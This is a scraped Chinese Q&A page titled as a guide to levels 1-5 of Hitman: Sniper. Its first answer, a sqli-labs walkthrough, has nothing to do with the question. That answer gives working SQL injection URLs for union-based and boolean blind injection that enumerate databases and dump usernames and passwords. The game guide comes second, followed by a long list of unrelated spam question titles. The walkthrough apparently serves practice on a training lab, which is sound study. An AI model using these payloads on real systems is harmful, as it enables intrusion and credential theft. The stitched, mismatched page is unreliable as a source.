问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

杀手:狙击第一章1-5关攻略

发布网友 发布时间:2022-04-11 06:36

我来回答

2个回答

懂视网 时间:2022-04-11 10:58

前言:

好久没手注了,被问了手注相关问题,忘的一干二净,抽出时间把手注再回忆一下,把sqli-labs简单过一下吧。

Less-1(GET单引号字符型注入)

#输入单引号后报错
http://192.168.1.115/sqli-labs/Less-1/?id=1%27

技术图片

#确定字段数
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 3%23
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 4%23

技术图片

技术图片

#联合查询查看页面是否有显示位
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,2,3%23

技术图片

#查询数据库名
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23

技术图片

#查询表名
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23

技术图片

#爆列
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users‘ %23

技术图片

#爆值
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(username,password),3 from users %23

技术图片

Less-2(GET整型注入)

#查看页面变化
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=1
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=2
#确定数字段
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 3%23
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 4%23
#联合查询查看显示位
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,2,3
#爆库
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),3
#爆表
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")
#爆列
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users‘
#爆值
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(username,password),3 from users

Less-3(GET单引号变形字符型注入)

#查看页面报错
http://192.168.1.115/sqli-labs/Less-2/?id=1‘
http://192.168.1.115/sqli-labs/Less-3/?id=1%27)%20%23
#确定数字段
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 3%23
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 4%23
#联合查询查看显示位
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union%20select%201,2,3%23
#爆库
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23
#爆表
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23
#爆列
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users‘%23
#爆值
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(username,password),3 from users%23

技术图片

技术图片

Less-4(GET双引号字符型注入)

http://192.168.1.115/sqli-labs/Less-4/?id=1%22

http://192.168.1.115/sqli-labs/Less-4/?id=1%22)%20%23

查看报错信息,使用双引号、右括号闭合,其余按照联合查询流程即可

技术图片

技术图片

Less-5(基于布尔的盲注)

#判断数据库版本,left(code, 1)表示取code字段从左截取1位
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=4 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=5 %23

#判断数据库长度,使用length()判断长度,二分法可提高效率
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())=8 %23

#猜当前数据库名,left(code, 1)表示取code字段从左截取1位,截取至数据库长度即可判断出数据库名
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>‘r‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>‘t‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)=‘s‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>‘d‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>‘f‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)=‘e‘ %23
...

#判断表的个数,count()函数是用来统计表中记录的一个函数,返回匹配条件的行数。
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(table_name) from information_schema.tables where table_schema=database())>0 %23

#判断表的长度,limit可以被用于强制select语句返回指定的记录数。
// SELECT * FROM table LIMIT 5,10; // 检索记录行 6-15
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 %23

#依次猜表名,substr(string,start,length);string为要截取的字符串;start为截取的起始位置;length为截取长度。
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80 %23
...类似

#确定列数
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(column_name) from information_schema.columns where table_schema=database() and table_name = ‘users‘)>0 %23

#确定列的长度
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select column_name from information_schema.columns where table_schema=database() and table_name = ‘users‘ limit 0,1)) > 0 %23

#依次猜列名
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name = ‘users‘ limit 0,1),1,1))>79 %23

#确定数据
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select username from users limit 0,1),1,1))>79 %23

sqli-labs通关1-5教程

标签:ascii   sele   表示   tab   条件   联合   匹配   column   order by   

热心网友 时间:2022-04-11 08:06

《杀手:狙击》是一款站桩射击游戏。这款游戏是继《杀手47:行动》之后SQUARE
ENIX推出的新作。那么杀手:狙击Hitman:
Sniper第一章1-5关要怎么过呢?接下来,小编就给大家带来了杀手:狙击Hitman:
Sniper第一章1-5关通关攻略,帮助大家轻松过关!
>>>杀手:狙击攻略大全
杀手:狙击Hitman:
Sniper第一章第1关攻略
按要求杀死目标就行。
杀手:狙击Hitman:
Sniper第一章第2关攻略
一.达到75000分
二.爆头2人
三.杀死目标
已经爆头2个。
下面有个头像
是这一关的特殊目标
可杀可不杀。
特殊目标标识紫色
需要锁定一段时间才显示。
杀手:狙击Hitman:
Sniper第一章第3关攻略
一.杀死护卫4人
二.杀死目标
杀手:狙击Hitman:
Sniper第一章第4关攻略
一.把任何尸体藏进水池里
二.杀死目标
等这个货靠近水池开一*就可以完成任务一了。
杀手:狙击Hitman:
Sniper第一章第5关攻略
一.达到125000分
二.不要让NPC提高警惕(建议在另一个NPC面前杀掉一个NPC,再把目击者干掉)
三.杀死目标
以上就是由小编给大家带来的杀手:狙击Hitman:
Sniper第一章1-5关攻略的全部内容了,希望对你有所帮助。

声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
为什么来大姨妈胸会胀 少儿学什么舞蹈 青年学什么舞蹈好 成年人学什么舞蹈 福州企业最低工资标准 2013年厦门的底薪是多少 生产要素的需求有哪些性质 生产要素的需求有何特点? 什么是生产要素需求 微观经济学要素需求什么是条件要素需求?它和要素需求有什么不同?_百度... 怎样才能微信定位里面加文字 微信撤销注销后还能查到交易账单吗? “过去的日子如。。。我留着些什么痕迹呢?”这句话出自(谁)写的散文名篇,你还知道他的作品 、等。 散文集《成长的痕迹》 席慕容 概括 ‘过去的日子如(),被风吹散了 ;如(),被初阳蒸融了,我留着些什么痕迹呢?是谁写的散文名篇 <<爱的痕迹>> 作文 散文 注销了还可以查到账单吗- 问一问 记忆中的痕迹 散文{不是散文集哦}《成长的痕迹》赏析 求一篇以痕为题的800字作文 以痕迹为题写一篇作文 不要散文,最好是记叙的类型的文章 求速度!! 最佳答案 再加50分 席慕容散文成长的痕迹摘抄并赏析以及主要内容 以成长的痕迹为题目的作文 关于成长的痕迹(散文)的一些优美句子 题目:痕迹要求:(1)写一篇600字左右的文章;(2)不得透露个人相关信息,不得抄袭。 请问电脑显示器会一闪一闪 画面模糊 是什么原因? 新浪微博字体颜色问题。 怎么让新浪微博字体变色 怎么改变新浪微博的字体颜色 我家电脑屏幕为什么有时候正常,有时候会一闪一闪的,字都看不清晰 我从小就非常讨厌狗和猫之类的动物,有一天晚上,我竟然梦见自己把狗抱起来,而且还非常亲密,我想知道原 梦见猫抱着狗是什么意思? 梦见我抱着狗猫掉进大池塘里? 请问抽油烟机的左右两边的风往下吹,正常吗 正太是什么意思???(形容女生的) 评价女生“正太”是什么意思? 买房子贷款下来了但没给我购房合同?售楼员说我手里边只有收据?没合同,说款还清了才有?对不对? 正太是什么意思,形容女生 按揭买房,交了首付后,我购房合同签了 不给我合同 女生被称为正太是什么意思 按揭购房,已经付首付了,也签了合同,还没去银行按揭,购房合同售楼部不给我这算正常吗 女生叫正太是什么意思?而且那个女生还有点像男的。。。是我的同学... 为什么一打开油烟机卫生间的浴霸排风就呼呼的吹风!是往下吹风!! 贷款还清了!为什么银行不给我购房合同 一般评价女生正太什么意思? 我刚买了房 组合贷款 贷款已经办下来了 手里有贷款合同和抵押合同 为什么没有购房合同?什么时候给我们? 办理按揭贷款,购房合同不给本人吗?办理贷款后没有凭证吗? 男生说女生正太是什么意思 一个女生形容另一个女生是正太是什么意思啊? 说女生正太型 是什么意思啊